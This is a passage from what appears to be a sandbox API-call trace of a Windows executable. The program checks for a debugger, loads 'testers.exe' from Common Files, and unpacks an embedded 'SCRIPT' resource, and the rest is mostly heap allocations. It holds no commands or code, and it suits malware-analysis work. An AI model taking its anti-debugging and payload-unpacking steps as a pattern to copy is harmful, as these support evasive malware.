Size=0x4) returned 0xbe5420 [0256.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x214) returned 0xbeaad8 [0256.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5430 [0256.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea750 [0256.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea6f0 | out: hHeap=0xbc0000) returned 1 [0256.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe53e0 | out: hHeap=0xbc0000) returned 1 [0256.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbd3318 | out: hHeap=0xbc0000) returned 1 [0256.496] IsDebuggerPresent () returned 0 [0256.496] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x7bfe18, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0256.496] GetLongPathNameW (in: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpszLongPath=0x7bfe18, cchBuffer=0x7fff | out: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe") returned 0x2f [0256.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea628 | out: hHeap=0xbc0000) returned 1 [0256.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x60) returned 0xbeacf8 [0256.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3318 [0256.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53e0 [0256.497] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x7bfde8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x0) returned 0x2f [0256.497] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbd3318 | out: hHeap=0xbc0000) returned 1 [0256.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x60) returned 0xbead60 [0256.497] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe64d0 [0256.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3318 [0256.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe64f8 [0256.498] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5440 [0256.498] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0256.498] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0256.498] Wow64DisableWow64FsRedirection (in: OldValue=0x7cfd84 | out: OldValue=0x7cfd84*=0x0) returned 1 [0256.498] FreeLibrary (hLibModule=0x75990000) returned 1 [0256.498] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe" (normalized: "c:\\program files (x86)\\common files\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x7cfc20, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0256.499] GetFileType (hFile=0xf8) returned 0x1 [0256.499] LoadLibraryExW (lpLibFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0256.501] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0256.501] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0256.501] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0256.501] FreeLibrary (hLibModule=0x75990000) returned 1 [0256.501] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10000) returned 0xbeadc8 [0256.501] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5450 [0256.501] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x7cfdb4 | out: ppstm=0x7cfdb4*=0xbe6520) returned 0x0 [0256.502] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0256.502] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0256.502] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0256.502] LockResource (hResData=0x3607b8) returned 0x3607b8 [0256.502] ISequentialStream:RemoteWrite (in: This=0xbe6520, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0256.502] IStream:RemoteSeek (in: This=0xbe6520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0256.502] IStream:RemoteSeek (in: This=0xbe6520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0256.502] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0xbeadc8, cb=0x18, pcbRead=0x7cfd0c | out: pv=0xbeadc8*=0xa3, pcbRead=0x7cfd0c*=0x18) returned 0x0 [0256.502] IStream:RemoteSeek (in: This=0xbe6520, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0256.502] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cfd50, cb=0x4, pcbRead=0x7cfd0c | out: pv=0x7cfd50*=0x45, pcbRead=0x7cfd0c*=0x4) returned 0x0 [0256.502] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe5450 | out: hHeap=0xbc0000) returned 1 [0256.502] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbeadc8 | out: hHeap=0xbc0000) returned 1 [0256.502] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cfd74, cb=0x10, pcbRead=0x7cfd4c | out: pv=0x7cfd74*=0x4d, pcbRead=0x7cfd4c*=0x10) returned 0x0 [0256.502] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cfc48 | out: lpSystemTimeAsFileTime=0x7cfc48*(dwLowDateTime=0x3a5ef330, dwHighDateTime=0x1d661be)) [0256.502] IStream:RemoteSeek (in: This=0xbe6520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0256.502] IStream:RemoteSeek (in: This=0xbe6520, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0256.502] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cf6c8, cb=0x4, pcbRead=0x7cf48c | out: pv=0x7cf6c8*=0x6b, pcbRead=0x7cf48c*=0x4) returned 0x0 [0256.502] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf388 | out: lpSystemTimeAsFileTime=0x7cf388*(dwLowDateTime=0x3a5ef330, dwHighDateTime=0x1d661be)) [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cf6d0, cb=0x4, pcbRead=0x7cf48c | out: pv=0x7cf6d0*=0xa6, pcbRead=0x7cf48c*=0x4) returned 0x0 [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cf4b8, cb=0x34, pcbRead=0x7cf48c | out: pv=0x7cf4b8*=0xe1, pcbRead=0x7cf48c*=0x34) returned 0x0 [0256.503] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf388 | out: lpSystemTimeAsFileTime=0x7cf388*(dwLowDateTime=0x3a5ef330, dwHighDateTime=0x1d661be)) [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cf6d0, cb=0x4, pcbRead=0x7cf48c | out: pv=0x7cf6d0*=0x17, pcbRead=0x7cf48c*=0x4) returned 0x0 [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cf6fc, cb=0x6e, pcbRead=0x7cf48c | out: pv=0x7cf6fc*=0xf9, pcbRead=0x7cf48c*=0x6e) returned 0x0 [0256.503] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf388 | out: lpSystemTimeAsFileTime=0x7cf388*(dwLowDateTime=0x3a5ef330, dwHighDateTime=0x1d661be)) [0256.503] IStream:RemoteSeek (in: This=0xbe6520, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cf6c0, cb=0x4, pcbRead=0x7cf48c | out: pv=0x7cf6c0*=0xbc, pcbRead=0x7cf48c*=0x4) returned 0x0 [0256.503] IStream:RemoteSeek (in: This=0xbe6520, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cf6c8, cb=0x4, pcbRead=0x7cf48c | out: pv=0x7cf6c8*=0x6b, pcbRead=0x7cf48c*=0x4) returned 0x0 [0256.503] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf388 | out: lpSystemTimeAsFileTime=0x7cf388*(dwLowDateTime=0x3a5ef330, dwHighDateTime=0x1d661be)) [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cf6d0, cb=0x4, pcbRead=0x7cf48c | out: pv=0x7cf6d0*=0xaf, pcbRead=0x7cf48c*=0x4) returned 0x0 [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cf4b8, cb=0x26, pcbRead=0x7cf48c | out: pv=0x7cf4b8*=0xe6, pcbRead=0x7cf48c*=0x26) returned 0x0 [0256.503] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf388 | out: lpSystemTimeAsFileTime=0x7cf388*(dwLowDateTime=0x3a5f1a40, dwHighDateTime=0x1d661be)) [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cf6d0, cb=0x4, pcbRead=0x7cf48c | out: pv=0x7cf6d0*=0x1b, pcbRead=0x7cf48c*=0x4) returned 0x0 [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cf6fc, cb=0x76, pcbRead=0x7cf48c | out: pv=0x7cf6fc*=0x6b, pcbRead=0x7cf48c*=0x76) returned 0x0 [0256.503] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf388 | out: lpSystemTimeAsFileTime=0x7cf388*(dwLowDateTime=0x3a5f1a40, dwHighDateTime=0x1d661be)) [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cfd83, cb=0x1, pcbRead=0x7cf6d4 | out: pv=0x7cfd83*=0x1, pcbRead=0x7cf6d4*=0x1) returned 0x0 [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cfd7c, cb=0x4, pcbRead=0x7cf6d4 | out: pv=0x7cfd7c*=0x86, pcbRead=0x7cf6d4*=0x4) returned 0x0 [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cfd7c, cb=0x4, pcbRead=0x7cf6d4 | out: pv=0x7cfd7c*=0xe4, pcbRead=0x7cf6d4*=0x4) returned 0x0 [0256.503] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0x7cfd7c, cb=0x4, pcbRead=0x7cf6d4 | out: pv=0x7cfd7c*=0x48, pcbRead=0x7cf6d4*=0x4) returned 0x0 [0256.504] IStream:RemoteSeek (in: This=0xbe6520, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0256.504] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x27c58) returned 0xc041e0 [0256.505] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x923a) returned 0xbeadc8 [0256.505] ISequentialStream:RemoteRead (in: This=0xbe6520, pv=0xbeadc8, cb=0x923a, pcbRead=0x7cf6d4 | out: pv=0xbeadc8*=0x6d, pcbRead=0x7cf6d4*=0x923a) returned 0x0 [0256.505] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7cf5d0 | out: lpSystemTimeAsFileTime=0x7cf5d0*(dwLowDateTime=0x3a5f4150, dwHighDateTime=0x1d661be)) [0256.507] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20000) returned 0xc2be40 [0256.508] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10000) returned 0xc4be48 [0256.508] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10000) returned 0xc5be50 [0256.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc2be40 | out: hHeap=0xbc0000) returned 1 [0256.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc4be48 | out: hHeap=0xbc0000) returned 1 [0256.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc5be50 | out: hHeap=0xbc0000) returned 1 [0256.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbeadc8 | out: hHeap=0xbc0000) returned 1 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x82e4) returned 0xbeadc8 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1c) returned 0xbe6570 [0256.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe6570 | out: hHeap=0xbc0000) returned 1 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6570 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea6f0 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6598 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea768 [0256.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea6f0 | out: hHeap=0xbc0000) returned 1 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xa) returned 0xbea6f0 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea780 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5450 [0256.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea780 | out: hHeap=0xbc0000) returned 1 [0256.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe5450 | out: hHeap=0xbc0000) returned 1 [0256.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea6f0 | out: hHeap=0xbc0000) returned 1 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea6f0 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1e) returned 0xbe65c0 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea780 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe65e8 [0256.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5450 [0256.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe65c0 | out: hHeap=0xbc0000) returned 1 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea798 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea7b0 [0256.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea780 | out: hHeap=0xbc0000) returned 1 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea780 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea7c8 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea7e0 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea7f8 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5460 [0256.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea7c8 | out: hHeap=0xbc0000) returned 1 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea7c8 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea810 [0256.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea7e0 | out: hHeap=0xbc0000) returned 1 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea7e0 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea828 [0256.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea840 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea858 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5470 [0256.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea828 | out: hHeap=0xbc0000) returned 1 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea828 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea870 [0256.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea840 | out: hHeap=0xbc0000) returned 1 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea840 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5480 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea888 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea8a0 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf30d0 [0256.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe5480 | out: hHeap=0xbc0000) returned 1 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea8b8 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea8d0 [0256.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea888 | out: hHeap=0xbc0000) returned 1 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbd22d0 [0256.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe6570 | out: hHeap=0xbc0000) returned 1 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea888 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x12) returned 0xbea628 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea8e8 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6570 [0256.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5480 [0256.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea628 | out: hHeap=0xbc0000) returned 1 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea900 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea918 [0256.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea8e8 | out: hHeap=0xbc0000) returned 1 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea8e8 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xa) returned 0xbea930 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea948 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf30e0 [0256.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea948 | out: hHeap=0xbc0000) returned 1 [0256.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf30e0 | out: hHeap=0xbc0000) returned 1 [0256.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea930 | out: hHeap=0xbc0000) returned 1 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea930 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea948 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xe) returned 0xbea960 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea978 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea990 [0256.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf30e0 [0256.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea960 | out: hHeap=0xbc0000) returned 1 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea960 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea9a8 [0256.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea978 | out: hHeap=0xbc0000) returned 1 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea978 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea9c0 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x80) returned 0xbf34b8 [0256.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbd22d0 | out: hHeap=0xbc0000) returned 1 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea9d8 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea9f0 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbeaa08 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbeaa20 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf30f0 [0256.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea9f0 | out: hHeap=0xbc0000) returned 1 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbea9f0 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbeaa38 [0256.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbeaa08 | out: hHeap=0xbc0000) returned 1 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbeaa08 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbeaa50 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbeaa68 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xe) returned 0xbeaa80 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbeaa98 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbeaab0 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3100 [0256.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbeaa80 | out: hHeap=0xbc0000) returned 1 [0256.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbeaa80 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3558 [0256.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbeaa98 | out: hHeap=0xbc0000) returned 1 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbeaa98 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3570 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3588 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x14) returned 0xbea628 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf35a0 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe65c0 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3110 [0256.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea628 | out: hHeap=0xbc0000) returned 1 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf35b8 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf35d0 [0256.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf35a0 | out: hHeap=0xbc0000) returned 1 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf35a0 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf35e8 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3600 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3618 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3630 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3648 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3120 [0256.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3618 | out: hHeap=0xbc0000) returned 1 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3618 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf3660 [0256.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf3630 | out: hHeap=0xbc0000) returned 1 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3630 [0256.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3678 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x100) returned 0xbf3940 [0256.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf34b8 | out: hHeap=0xbc0000) returned 1 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf3690 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6610 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf36a8 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6638 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbf3130 [0256.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe6610 | out: hHeap=0xbc0000) returned 1 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xbf36c0 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbf36d8 [0256.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbf36a8 | out: hHeap=0xbc0000) returned 1 [0256.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, 